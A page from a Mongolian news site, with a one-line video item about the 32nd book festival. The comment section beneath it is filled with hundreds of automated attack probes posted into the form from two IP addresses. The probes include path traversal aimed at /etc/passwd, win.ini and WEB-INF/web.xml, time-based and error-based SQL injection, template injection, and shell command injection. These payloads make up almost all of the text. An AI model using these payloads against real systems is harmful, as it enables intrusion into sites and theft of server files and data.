32 дахь удаагийн номын баяр гурав хоног үргэлжилнэ

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-09-15 21:48:57
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 440 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 440 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 440 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 440 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 440 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 440 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 440 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 440 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 440 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 440 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 440 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',11)='x 185.234.72.114 440 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 440 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 185.234.72.114 440 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 440 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:11 185.234.72.114 440 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 440 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 440 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(11))::text>'0 185.234.72.114 440 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 440 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 440 өдөр

  123456
 • admin"and(select*from(select+sleep(11))a/**/union/**/select+1)=" 185.234.72.114 440 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 440 өдөр

  123456
 • admin'and(select*from(select+sleep(11))a/**/union/**/select+1)=' 185.234.72.114 440 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 440 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 440 өдөр

  123456
 • admin"and"i"="q 185.234.72.114 440 өдөр

  123456
 • admin"and"l"="l 185.234.72.114 440 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 440 өдөр

  123456
 • admin'and'i'='w 185.234.72.114 440 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 440 өдөр

  123456
 • admin'and'q'='q 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',11)='q
 • admin 185.234.72.114 440 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m
 • admin 185.234.72.114 440 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('o',11)
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('u',0)
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:11
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:11'/**/
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 440 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(11))::text>'0
 • admin 185.234.72.114 440 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 440 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(11))>0/**/
 • admin'"\( 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 440 өдөр

  123456"and(select*from(select+sleep(11))a/**/union/**/select+1)="
 • admin鎈'"\( 185.234.72.114 440 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1244514245')))>'0 185.234.72.114 440 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'and(select*from(select+sleep(11))a/**/union/**/select+1)='
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1457317208'))) 185.234.72.114 440 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin/**/and/**/cast(md5('1769500735')as/**/int)>0 185.234.72.114 440 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  (select*from(select+sleep(11)union/**/select+1)a)
 • admin 185.234.72.114 440 өдөр

  <%- 818949546+926287612 %>
 • admin'and(select'1'from/**/cast(md5(1283182683)as/**/int))>'0 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  expr 978805112 + 848550644
 • %2fetc%2fpasswd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 440 өдөр

  123456&set /A 943415644+905599008
 • extractvalue(1,concat(char(126),md5(1698534155))) 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  #set($c=811688311+927022201)${c}$c
 • /etc/passwdadmin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456$(expr 868286668 + 826768343)
 • admin"and/**/extractvalue(1,concat(char(126),md5(1015668848)))and" 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  ${(812963702+818086463)?c}
 • /etc/passwd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456|expr 932387557 + 862268878
 • admin'and/**/extractvalue(1,concat(char(126),md5(1951710047)))and' 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  ${832992390+809233613}
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456 expr 815572578 + 826705687
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456"and"r"="b
 • admin 185.234.72.114 440 өдөр

  123456'"\(
 • admin 185.234.72.114 440 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 440 өдөр

  123456"and"k"="k
 • admin 185.234.72.114 440 өдөр

  123456'and'm'='c
 • ./../../../../../../etc/passwd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1619417776')))>'0
 • admin 185.234.72.114 440 өдөр

  /*1*/{{929879711+996723894}}
 • ../../../../../../etc/passwdadmin 185.234.72.114 440 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1332963736')))
 • admin 185.234.72.114 440 өдөр

  '-var_dump(md5(548932044))-'
 • admin 185.234.72.114 440 өдөр

  123456/**/and/**/cast(md5('1996906532')as/**/int)>0
 • admin 185.234.72.114 440 өдөр

  123456'and'z'='z
 • admin 185.234.72.114 440 өдөр

  123456/**/and+2=8
 • admin 185.234.72.114 440 өдөр

  ${@var_dump(md5(514355530))};
 • admin 185.234.72.114 440 өдөр

  123456'and(select'1'from/**/cast(md5(1140571565)as/**/int))>'0
 • admin 185.234.72.114 440 өдөр

  123456/**/and+3=3
 • admin 185.234.72.114 440 өдөр

  swzwmkxoohyetrnbonyy
 • expr 942109058 + 897642497 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  ${949710366+815260074}
 • admin&set /A 844503475+900361090 185.234.72.114 440 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 440 өдөр

  123456
 • <%- 971870640+877889269 %> 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  extractvalue(1,concat(char(126),md5(1379686179)))
 • #set($c=816246835+942536871)${c}$c 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1312255703)))and"
 • admin 185.234.72.114 440 өдөр

  123456
 • ${(938537792+873848996)?c} 185.234.72.114 440 өдөр

  123456
 • admin$(expr 910758603 + 913193417) 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1486260177)))and'
 • '-var_dump(md5(328306741))-' 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin|expr 842598763 + 837123540 185.234.72.114 440 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 440 өдөр

  123456
 • ${964210372+961666047} 185.234.72.114 440 өдөр

  123456
 • swzwmkxoohyetrnbonyy 185.234.72.114 440 өдөр

  123456
 • ${@var_dump(md5(122600198))}; 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • /*1*/{{962889675+975602643}} 185.234.72.114 440 өдөр

  123456
 • ${829711712+937449074} 185.234.72.114 440 өдөр

  123456
 • admin expr 960159995 + 817730055 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin 185.234.72.114 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',7)='a
 • admin 194.163.191.42 440 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f
 • admin 194.163.191.42 440 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('k',7)
 • admin 194.163.191.42 440 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
 • admin 194.163.191.42 440 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:7
 • admin 194.163.191.42 440 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 440 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/
 • admin 194.163.191.42 440 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 440 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0
 • admin 194.163.191.42 440 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 440 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(8))>0/**/
 • admin 194.163.191.42 440 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/
 • admin 194.163.191.42 440 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 440 өдөр

  123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
 • admin 194.163.191.42 440 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 440 өдөр

  123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='
 • admin 194.163.191.42 440 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 440 өдөр

  (select*from(select+sleep(7)union/**/select+1)a)
 • admin 194.163.191.42 440 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 440 өдөр

  123456"and"r"="x
 • admin 194.163.191.42 440 өдөр

  123456"and"t"="t
 • admin 194.163.191.42 440 өдөр

  123456'and'k'='n
 • admin 194.163.191.42 440 өдөр

  123456'and'c'='c
 • admin 194.163.191.42 440 өдөр

  123456'"\(
 • admin 194.163.191.42 440 өдөр

  123456/**/and+0=7
 • admin 194.163.191.42 440 өдөр

  123456/**/and+2=2
 • admin 194.163.191.42 440 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 440 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1645466495')))>'0
 • admin 194.163.191.42 440 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1022972750')))
 • admin 194.163.191.42 440 өдөр

  123456/**/and/**/cast(md5('1481243182')as/**/int)>0
 • admin 194.163.191.42 440 өдөр

  123456'and(select'1'from/**/cast(md5(1092875372)as/**/int))>'0
 • admin 194.163.191.42 440 өдөр

  extractvalue(1,concat(char(126),md5(1392218334)))
 • admin 194.163.191.42 440 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1066784060)))and"
 • admin 194.163.191.42 440 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1353160236)))and'
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 440 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 440 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 440 өдөр

  123456
 • expr 817592140 + 821416958 194.163.191.42 440 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 440 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 440 өдөр

  123456
 • admin&set /A 923883674+807860301 194.163.191.42 440 өдөр

  123456
 • <%- 983176049+833527536 %> 194.163.191.42 440 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',7)='b 194.163.191.42 440 өдөр

  123456
 • #set($c=915598081+835795064)${c}$c 194.163.191.42 440 өдөр

  123456
 • admin$(expr 828986266 + 831080425) 194.163.191.42 440 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 440 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',0)='h 194.163.191.42 440 өдөр

  123456
 • ${(819617081+977655424)?c} 194.163.191.42 440 өдөр

  123456
 • admin'"\( 194.163.191.42 440 өдөр

  123456
 • admin|expr 885279309 + 847103313 194.163.191.42 440 өдөр

  123456
 • ${924333914+935345344} 194.163.191.42 440 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:7 194.163.191.42 440 өдөр

  123456
 • /etc/passwd 194.163.191.42 440 өдөр

  123456
 • admin expr 988726514 + 958123677 194.163.191.42 440 өдөр

  123456
 • /*1*/{{816369395+912467727}} 194.163.191.42 440 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 440 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 440 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  expr 987388060 + 801977162
 • admin 194.163.191.42 440 өдөр

  <%- 842501167+806207374 %>
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 440 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1771098468')))>'0 194.163.191.42 440 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(7))::text>'0 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456&set /A 853613433+939439047
 • admin 194.163.191.42 440 өдөр

  #set($c=966644242+859180471)${c}$c
 • ./../../../../../../etc/passwd 194.163.191.42 440 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1428217471'))) 194.163.191.42 440 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456$(expr 828990550 + 850244288)
 • admin 194.163.191.42 440 өдөр

  ${(907857221+898463435)?c}
 • ../../../../../../etc/passwdadmin 194.163.191.42 440 өдөр

  123456
 • admin/**/and/**/cast(md5('1589403825')as/**/int)>0 194.163.191.42 440 өдөр

  123456
 • admin"and(select*from(select+sleep(7))a/**/union/**/select+1)=" 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456|expr 975832353 + 945735044
 • admin 194.163.191.42 440 өдөр

  ${993734809+880164420}
 • ../../../../../../etc/passwd 194.163.191.42 440 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1476884856)as/**/int))>'0 194.163.191.42 440 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456 expr 841620229 + 930340526
 • admin 194.163.191.42 440 өдөр

  /*1*/{{951548349+908133528}}
 • admin'and(select*from(select+sleep(7))a/**/union/**/select+1)=' 194.163.191.42 440 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1527932569))) 194.163.191.42 440 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1815024821)))and" 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  '-var_dump(md5(619219976))-'
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  ${@var_dump(md5(638169974))};
 • admin 194.163.191.42 440 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1572182573)))and' 194.163.191.42 440 өдөр

  123456
 • qhgxwiizltjdsbqnpnxx 194.163.191.42 440 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin"and"m"="t 194.163.191.42 440 өдөр

  123456
 • admin"and"k"="k 194.163.191.42 440 өдөр

  123456
 • ${922350035+838682753} 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  qhgxwiizltjdsbqnpnxx
 • admin'and't'='r 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  ${878156674+844264801}
 • admin 194.163.191.42 440 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 440 өдөр

  123456
 • admin'and'w'='w 194.163.191.42 440 өдөр

  123456
 • '-var_dump(md5(825697464))-' 194.163.191.42 440 өдөр

  123456
 • ${@var_dump(md5(344019500))}; 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin 194.163.191.42 440 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',19)='a 194.163.191.42 475 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',0)='i 194.163.191.42 475 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:19 194.163.191.42 475 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 475 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(19))::text>'0 194.163.191.42 475 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 475 өдөр

  123456
 • admin"and(select*from(select+sleep(19))a/**/union/**/select+1)=" 194.163.191.42 475 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 475 өдөр

  123456
 • admin'and(select*from(select+sleep(19))a/**/union/**/select+1)=' 194.163.191.42 475 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 475 өдөр

  123456
 • admin"and"o"="o 194.163.191.42 475 өдөр

  123456
 • admin"and"w"="w 194.163.191.42 475 өдөр

  123456
 • admin'and't'='h 194.163.191.42 475 өдөр

  123456
 • admin'and'z'='z 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',19)='f
 • admin 194.163.191.42 475 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',0)='n
 • admin 194.163.191.42 475 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('b',19)
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('a',0)
 • ../../../../WEB-INF/web.xml 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:19
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • ../../../WEB-INF/web.xml 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:19'/**/
 • admin 194.163.191.42 475 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ../../WEB-INF/web.xml;admin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(19))::text>'0
 • ../../WEB-INF/web.xml 194.163.191.42 475 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 475 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • WEB-INF/web.xml;admin 194.163.191.42 475 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(19))>0/**/
 • admin 194.163.191.42 475 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456"and(select*from(select+sleep(19))a/**/union/**/select+1)="
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and(select*from(select+sleep(19))a/**/union/**/select+1)='
 • ./../../../../../../Windows/win.ini 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 475 өдөр

  (select*from(select+sleep(19)union/**/select+1)a)
 • ../../../../../../Windows/win.ini 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 475 өдөр

  123456"and"o"="y
 • admin 194.163.191.42 475 өдөр

  123456"and"d"="d
 • admin 194.163.191.42 475 өдөр

  123456'and'p'='i
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'and'a'='a
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456/**/and+3=9
 • admin 194.163.191.42 475 өдөр

  123456/**/and+1=1
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 475 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 475 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 475 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 475 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 475 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 475 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 475 өдөр

  123456
 • admin'"\( 194.163.191.42 475 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 475 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 475 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 475 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1038531150')))>'0 194.163.191.42 475 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 475 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1995136582'))) 194.163.191.42 475 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 475 өдөр

  123456
 • admin/**/and/**/cast(md5('1966746904')as/**/int)>0 194.163.191.42 475 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 475 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1702363746)as/**/int))>'0 194.163.191.42 475 өдөр

  123456
 • /etc/passwd 194.163.191.42 475 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1091853298))) 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456
 • <%- 928474636+932132838 %> 194.163.191.42 475 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 475 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1429286166)))and" 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456
 • #set($c=880799331+834346887)${c}$c 194.163.191.42 475 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 475 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1900427622)))and' 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456
 • ${(808556402+842746736)?c} 194.163.191.42 475 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 475 өдөр

  123456
 • admin 194.163.191.42 475 өдөр

  123456'"\(
